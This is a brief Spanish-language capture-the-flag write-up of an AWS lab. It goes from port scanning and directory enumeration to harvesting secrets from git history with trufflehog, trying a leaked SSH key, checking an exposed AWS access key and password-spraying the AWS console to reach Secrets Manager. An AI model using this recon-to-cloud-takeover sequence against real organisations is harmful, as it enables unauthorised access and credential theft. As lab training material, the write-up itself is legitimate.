Emerge through the breach

Emerge through the breach


Aws PwnedLabs

wichSystem.py 44.208.228.94

ssh_command.

Nos damos cuenta que es Linux.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 44.208.228.94 -oG allPorts

ssh_command.

extractPorts allports

ssh_command.

nmap -sCV -p22,80,443 44.208.228.94 -oN targeted

ssh_command.

whatweb http://44.208.228.94

ssh_command.

dirsearch -u http://44.208.228.94

ssh_command.

Nos dirigimos a http://44.208.228.94

ssh_command.

Nada interesante en esta pagina estatica. Vemos el codigo detras de la pagina y encontramos lo siguiente:

ssh_command.

Vemos la pagina con dos repositorios.

ssh_command.

trufflehog --regex --entropy=False mp-website

ssh_command.

git log

ssh_command. git clone https://bitbucket.org/massive-pharma/trial-data-management-poc.git

trufflehog filesystem trial-data-management-poc

ssh_command.

vim id_rsa

chmod 600 id_rsa

ssh -i id_rsa haru@44.208.228.94

No pude meterme por ssh.

git log

ssh_command.

git show c167543e30628c5a76f79f519a0adb752b238106

ssh_command.

git show 14129237ea34eeefbced772092c9264f60b2cefa

ssh_command.

aws sts get-access-key-info --access-key AKIATCKANV3QK3BT3CVG

GoAWSConsoleSpray -a 211125382880 -u users.txt -p pws.txt

ssh_command.

Iniciamos session en aws console

ssh_command.

Le damos click a AWS Secrets Manager

ssh_command.

Le damos click a flag.

ssh_command.

© 2026 Cu3rv0x